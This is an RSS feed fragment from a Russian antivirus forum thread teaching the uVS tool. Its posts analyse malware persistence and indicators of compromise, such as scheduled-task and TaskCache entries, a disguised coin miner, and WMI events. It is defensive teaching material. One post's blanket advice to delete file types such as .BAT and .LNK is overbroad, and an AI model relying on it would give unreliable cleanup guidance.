			Чем ещё "животное" может отличаться от обычной программы ?<br />Например типом запуска - запуск не просто прописан в Task<br />Может быть дополнительная запись\параметр: TaskCache<br />т.е. при удалении задачи - задача может сомо-восстановиться...<br />Для простой программы это не нужно...<br />------<br />Пример:<br />Полное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\USERS\NIKITA\<span class="bx-font" style="color:#9D0A0F">APPDATA\ROAMING</span>\MICROSOFT\ADMODNETW4B8\ADNEKMOD8B4.DLL<br />Имя файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ADNEKMOD8B4.DLL<br />Тек. статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ПОДОЗРИТЕЛЬНЫЙ в автозапуске <br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Сохраненная информация &nbsp; &nbsp; &nbsp;на момент создания образа<br />Статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="bx-font" style="color:#9D0A0F">в автозапуске</span> <br />File_Id &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 5FDC35A8C000<br />Linker &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;11.0<br />Размер &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="bx-font" style="color:#9D0A0F">12800 байт</span><br /><span class="bx-font" style="color:#9D0A0F">Создан</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;18.12.2020 в 18:37:33<br />Изменен &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 18.12.2020 в 18:37:33<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />TimeStamp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 18.12.2020 в 04:52:56<br />EntryPoint &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+<br />OS Version &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0.0<br />Subsystem &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Windows character-mode user interface (CUI) subsystem<br />IMAGE_FILE_DLL &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+<br />IMAGE_FILE_EXECUTABLE_IMAGE +<br />Тип файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 64-х битный ИСПОЛНЯЕМЫЙ<br />Цифр. подпись &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Отсутствует либо ее не удалось проверить<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Оригинальное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="bx-font" style="color:#9D0A0F">AdNetwork.dll</span><br />Версия файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;1.0.0.0<br />Описание &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;AdNetwork<br />Производитель &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br />Комментарий &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Доп. информация &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; на момент обновления списка<br />Файл &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\RUNDLL32.EXE<br />CmdLine &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; C:\USERS\NIKITA\APPDATA\ROAMING\MICROSOFT\ADMODNETW4B8\ADNEKMO<WBR/>&shy;D8B4.DLL,<span class="bx-font" style="color:#9D0A0F">AMIGO</span>UPDATER<br />SHA1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0CBA96ADD40FC610017EF4A2BA8F4220694A1018<br />MD5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; B5BF285378916D5119D87C08917FE872<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылки на объект &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\<span class="bx-font" style="color:#9D0A0F">ZAMIGO</span>BROWSERUPDATE<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\<span class="bx-font" style="color:#9D0A0F">TaskCache</span>\Tasks\{C95E75C3-E3E5-4062-89C5-D661FD154BA4}\Actions<br />Actions &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "rundll32.exe" C:\Users\Nikita\AppData\Roaming\Microsoft\AdModNetW4b8\adnekmo<WBR/>&shy;d8b4.dll,<span class="bx-font" style="color:#9D0A0F">AmigoUpdater</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\<span class="bx-font" style="color:#9D0A0F">TaskCache</span>\Plain\{C95E75C3-E3E5-4062-89C5-D661FD154BA4}\<br />---------<br />Что здесь подозрительно: Оригинальное имя отличается; Имя задачи отличается, задано с ошибкой\небрежно; небольшой размер файла, левый путь до файла, автозапуск, отсутствие ЭЦПодписи; Работа с системным RUNDLL32.EXE, не просто Task а TaskCache, Это новый недавно созданный файл.<br /><br /><br /><br />... <br />
			<i>29.12.2020 21:00:15, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message111503/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message111503/</guid>
			<pubDate>Tue, 29 Dec 2020 21:00:15 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message111336/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			В uVS &nbsp;можно работать с реестром неактивной системы.<br /><br />Для этого нужен или Live CD или вторая установленная система.<br /><br />Запускаем uVS &gt; выбираем нужную нам систему ( папку\каталог ) &nbsp;Windows<br />Программа найдёт реестр: ( например по пути: C:\Windows\System32\config )<br /><br />Находим нужный нам файл\объект &gt; открываем: Информация<br />Находим строку с нужной записью &gt; хлопаем мышью 2х &gt; на выбранном пункте откроется реестр.<br />пример на фото.<br />И здесь можно внести нужные нам изменения. <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118227&" width="395" height="484" /><br /><img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118228&" width="949" height="564" /><br /><i>14.12.2020 23:42:52, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message111336/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message111336/</guid>
			<pubDate>Mon, 14 Dec 2020 23:42:52 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message109648/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Ответ на вопрос из темы: &nbsp;<noindex><a href="https://forum.esetnod32.ru/messages/forum17/topic16008/message109647/?result=reply#message109647" target="_blank" rel="nofollow">файлы jpg, png, txt, gif, webp, dll, ini , Возможные угрозы</a></noindex><br /><br /><br />1) Есть файлы с двойным расширением: <br /><br />Если _включено в ( Параметры папок ): Скрывать расширения для зарегистрированных типов файлов то пользователь будет видеть: picture.jpg<br />Хотя реально это будет: picture.jpg.exe<br /><br />2) Исполняемый файл может содержать фрагмент изображения. ( ресурс )<br />т.е. маскировка под файл изображения, видео или офиса.<br /><br />3) Изображение может включать исполняемый код ( эксплуатируется &nbsp;уязвимость на старых или не обновлённых системах )<br />Как найти:<br />а) Сам файл изображения не должен включать осмысленный код\текст.<br />т.е. можно открыть файл .jpg в текстовом редакторе и посмотреть.<br /><br />б) Проверить в uVS <br />Файл &gt; Добавить в список &gt; Все исполняемые файлы в каталоге ( или указываем диск )<br />Получите список _всех _исполняемых файлов каталога или диска. (.exe; dll и т.д ) ( вне зависимости от видимого расширения файла )<br /><br />в) Проверить файл на <noindex><a href="https://www.virustotal.com/gui/home/upload" target="_blank" rel="nofollow">https://www.virustotal.com/gui/home/upload</a></noindex><br />И после анализа файла посмотреть все вкладки - что какие компоненты входят в состав файла.<br />Сравнить с обычным файлом изображения.<br /><br />г) Переименовать файл в *****.zip и открыть на просмотр в архиваторе.<br />Если файл исполняемый то архиватор такой файл откроет ( как правило ) ... если не исполняемый выдаст ошибку.<br /><br />д) Работаем с программой: Resource Hacker &nbsp;( можно посмотреть ресурсы файла\программы - есть они, нет и какие это ресурсы ) <br />
			<i>06.09.2020 17:21:14, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message109648/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message109648/</guid>
			<pubDate>Sun, 06 Sep 2020 17:21:14 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message109116/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Какие файлы можно удалять не боясь угробить систему ?<br />Можно удалять файлы с расширениями:<br />.BAT<br /><br />Пример:<br />OK.BAT<br />VK.BAT<br />BROWSER.BAT<br />BROWSER.EXE.BAT<br /><br />.URL<br /><br />BROWSER.URL<br />FIREFOX.URL<br />CHROME.URL<br /><br />HTTP:<br /><br />HTTP://<br />HTTP:\\<br />0HTTP://<br />0HTTP:\\<br />EXPLORER.EXE HTTP://<br />EXPLORER.EXE HTTP:\\<br />OPERA.EXE HTTP://<br />OPERA.EXE HTTP:\\<br /><br />.XML<br /><br />ASK-SEARCH.XML<br />CONDUIT-SEARCH.XML<br /><br />.TMP<br />.LNK<br /><br />--------------------------------------------------------<br />Какие пути чаще всего используются:<br />\APPDATA\LOCAL\<br />\APPDATA\ROAMING\<br />\APPLICATION DATA\<br />\PROGRAMDATA\<br /><br />\PROGRAMS\STARTUP\<br />\START MENU\PROGRAMS\STARTUP\<br />\TEMP\<br /><br />\TEMP\ - каталоги "TEMP" содержать временные файлы ( как правило эти временные файлы используются 1-2 раза - значит их можно удалять )<br />\PROGRAMS\STARTUP\ - каталоги вообще не должны ничего содержать ( если вы сами не добавили программу\ярлык в запуск ) <br />
			<i>27.05.2020 09:19:07, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message109116/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message109116/</guid>
			<pubDate>Wed, 27 May 2020 09:19:07 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message109079/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Когда вирус сам себя обнаруживает.<br />Вирусы создают но бывает создают криво с ошибками и пользователь видит сообщение об ошибке.<br />Как мы ранее выяснили часто вирусы пытаются замаскировать под системные файлы, или хотя бы изобразить что-то похожее на известный объект.<br />Запускаем uVS находим по поиску ( по имени файла, или пути )<br />( если не можем найти по поиску помним, что имя может содержать как кириллические так и латинские символы ( в данном случае это могут быть: Т; А ; H ; О )<br />Проверяем файл по virustotal.com &nbsp;открываем Инфо. файла и смотрим:<br />Обращаем внимание на время создания файла; имя; атрибуты; смотрим тип файла, в автозапуске он или нет и на способ\тип запуска.<br /><br />Полное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\PROGRAMDATA\REALTEKHD\TASKHOST.EXE<br />Имя файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; TASKHOST.EXE<br />Тек. статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске <br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br /><noindex><a href="http://www.virustotal.com" target="_blank" rel="nofollow">www.virustotal.com</a></noindex> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;2020-05-21<br /><br />Malwarebytes &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;RiskWare.BitCoinMiner<br />ESET-NOD32 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Win32/CoinMiner.BGU<br /><br /><br />Сохраненная информация &nbsp; &nbsp; &nbsp;на момент создания образа<br />Статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ПОДОЗРИТЕЛЬНЫЙ в автозапуске <br />File_Id &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 5EB17B071B9000<br />Linker &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;12.0<br />Размер &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;1767424 байт<br />Создан &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;05.05.2020 в 16:50:35<br />Изменен &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 05.05.2020 в 17:41:40<br />Атрибуты &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;СКРЫТЫЙ &nbsp;СИСТЕМНЫЙ &nbsp;<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />TimeStamp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 05.05.2020 в 14:41:11<br />EntryPoint &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+<br />OS Version &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;0.2<br />Subsystem &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Windows graphical user interface (GUI) subsystem<br />IMAGE_FILE_DLL &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;-<br />IMAGE_FILE_EXECUTABLE_IMAGE +<br />Тип файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 64-х битный ИСПОЛНЯЕМЫЙ<br />Цифр. подпись &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Отсутствует либо ее не удалось проверить<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Оригинальное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;MicrosoftHost.exe<br />Версия файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;2.14.0<br />Описание &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;NT Kernel & System<br />Copyright &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Microsoft Corporation<br />Производитель &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Microsoft Corporation<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ<br />Атрибут файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "Скрытый" или "Системный" [типично для вирусов]<br />Путь до файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Не_типичен для этого файла [имя этого файла есть в известных]<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Доп. информация &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; на момент обновления списка<br />SHA1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;AC6B619ACECE942F27D75E1E0EA46B94BC9B91A9<br />MD5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DE88D7EC667DEA756D236E9053D7EEB9<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылки на объект &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\Wininet\REALTEKHDC<WBR/>&shy;ONTROL<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\Wininet\REALTEKHDS<WBR/>&shy;TARTUP<br />--------------<br />Здесь использовано известное имя и нетипичный путь до файла, файл скрытый, вердикт на V.T. многократно прописан в задачах.<br />--------------<br />Принцип здесь такой: + + + + <br />каждое отклонение добавляет + к файлу и чем больше этих плюсов тем подозрительнее объект ( ведь не всегда есть интернет и возможность проверить файл антивирусами )<br />---------------<br />Нашли одну угрозу ?<br />Ищите дальше - их может быть и две и три не всё же надеяться на чужие ошибки. <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=116659&" width="391" height="162" /><br /><i>21.05.2020 22:58:38, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message109079/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message109079/</guid>
			<pubDate>Thu, 21 May 2020 22:58:38 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108684/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			uVS может работать с неактивной системой.<br />Для чего ?<br />В случае когда система не загружается, когда тормозит и невозможно нормально работать, если есть подозрение на руткит, система заблокирована вымогателем, чтобы не допустить дальнего распространения вируса - блокировать его активность, его деструктивные действия.<br /><br />так, как систем может быть установлено несколько: <br />1) При запуске выбираем: Выбрать каталог Windows ( выбрана активная система )<br />* Активная система - это та система в которой вы сейчас работаете ( например система загрузочного диска Live CD ( WinPE )<br /><br />2) Выбираем нужную нам Windows &nbsp;например: C:\Windows &nbsp;или &nbsp;F:\Windows<br />т.е. нам нужно указать программе на нужный каталог.<br /><br />Посмотреть инструкцию. ( здесь показано как создавать образ автозапуска т.е. сбор информации по системе )<br /><noindex><a href="http://forum.esetnod32.ru/forum6/topic2102/" target="_blank" rel="nofollow">http://forum.esetnod32.ru/forum6/topic2102/</a></noindex><br /><noindex><a href="http://forum.esetnod32.ru/forum9/topic683/" target="_blank" rel="nofollow">http://forum.esetnod32.ru/forum9/topic683/</a></noindex><br /><br />3) Запускаем под текущим пользователем.<br /><br />Имена дисков C:\ &nbsp;D:\ E:\ &nbsp;и т.д. &nbsp;могут отображаться не так как вы привыкли.<br />Чтобы это компенсировать в &nbsp;программе есть транслятор имён дисков.<br />Обязательно обращайте внимание на это... Если систем несколько вы можете подключить не ту систему которую нужно - или продолжать работать с активной системой.<br /><br />---------------------<br />Если антивирус сигнализирует об обнаружении угрозы в одно и тоже время ?<br />Если запуск\обнаружение - угрозы происходит в одно и то же время - значит работает системный планировщик заданий.<br />Так планировщик может работать с браузером и т.д. <br />
			<i>24.03.2020 19:16:43, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108684/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108684/</guid>
			<pubDate>Tue, 24 Mar 2020 19:16:43 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108683/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Часто в работу системы вмешиваются хвосты...<br />Нет, это не те хвосты к которым мы привыкли - это хвосты антивирусов.<br />Был у человека антивирус - антивирус удалили, а хвосты то остались...<br />Хвост - это служба, служба караульная - держать и не пущать !<br /><br />Как выявить ?<br />Как правило все компоненты антивирусов подписаны производителем ( т.е. имеют свою ЭЦП )<br /><br />AVAST Software a.s.<br />AVG Technologies<br />Kaspersky Lab<br />и т.д.<br /><br />Жмём F6 - идёт проверка ЭЦП<br />Выбираем категорию: Весь Автозапуск или категорию ВСЕ<br />Выбираем колонку: Производитель.<br />Для того &nbsp;чтобы упростить себе поиск выбираем чек бокс: [v] известные  ( скрыть известные )<br />Чтобы система не тормозила - хвосты удаляем.<br />А ведь есть ещё и левые антивирусы.<br />У Компонентов антивирусов как правило есть самозащита поэтому нужно удалять, или в безопасном режиме, или с Live CD ( работая с неактивной системой )<br />Бывает, что люди устанавливают по 5-ть антивирусов и здесь уже не до хвостов. ( тогда удаляем штатно + спец. программой )<br />Практически у всех разработчиков-антивирусов есть специальные программы &nbsp;для удаления их продуктов.<br />Поэтому лучше найти\определить следы\компоненты какого антивируса есть в системе и применить спец. утилиту для удаления.<br />Антивирусов очень много - хорошо если известно какой антивирус был установлен.<br /><br />У Avast это Avast Clear (Uninstall Utility)<br /><noindex><a href="https://www.comss.ru/page.php?id=383" target="_blank" rel="nofollow">https://www.comss.ru/page.php?id=383</a></noindex><br /><br />У AVG &nbsp;- AVG Clear<br /><noindex><a href="http://www.comss.ru/page.php?id=1301" target="_blank" rel="nofollow">http://www.comss.ru/page.php?id=1301</a></noindex><br /><br />Kaspersky kav-removal<br /><noindex><a href="http://www.comss.ru/download/kav+removal+tool.html" target="_blank" rel="nofollow">http://www.comss.ru/download/kav+removal+tool.html</a></noindex><br /><br />и т.д.<br />Список производителей можно посмотреть на том же V.T. <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=116089&" width="927" height="560" /><br /><i>24.03.2020 18:39:29, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108683/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108683/</guid>
			<pubDate>Tue, 24 Mar 2020 18:39:29 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108682/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Категория <noindex><a href="https://ru.wikipedia.org/wiki/WMI" target="_blank" rel="nofollow">WMI</a></noindex> <br />Как выявить подозрительный объект.<br />Как правило в данной категории есть 1-2 записи.<br />Если таких записей больше - это уже подозрительно.<br />Инструментом WMI &nbsp;мало кто пользуется - в основном системные администраторы в компаниях и то редко - редко...<br />Можно ли снести все записи не разбираясь ?<br />Да, можно - видимого влияния на работу системы это не оказывает. <br /><br />При удалении вируса - <br />СМОТРИТЕ ЧТОБЫ НЕ БЫЛО ССЫЛОК НА СИСТЕМНЫЕ ФАЙЛЫ. ( если, есть такая ссылка - то в программе предусмотрена безосная команда: ( Удалить WMI Event )<br /><br />Однако если разобраться...<br />Открываем Инфо.<br />Это вирус, если в тексте есть записи: .VBS ; VBScript ; ****.exe ; браузер.exe<br />Внутренние ссылки с указанием на любой &nbsp;исполняемый файл. ( в том числе на любой системный )<br />Любая запись с внешним адресом: http://*** &nbsp;HTTPS://*** и т.д.<br />Лучше всего сохранить текст в блокнот - так будет удобно его просматривать.<br />Можно запомнить - какая запись есть в норме. И удалять любую новую\неизвестную запись.<br />Если запись успела засветиться - тогда имеет смысл проверить полученный вами текстовый файл на V.T <br />
			<i>24.03.2020 18:02:15, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108682/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108682/</guid>
			<pubDate>Tue, 24 Mar 2020 18:02:15 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108681/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Спасибо за информацию <br />
			<i>23.03.2020 23:27:55, Катерина Петрова.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108681/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108681/</guid>
			<pubDate>Mon, 23 Mar 2020 23:27:55 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
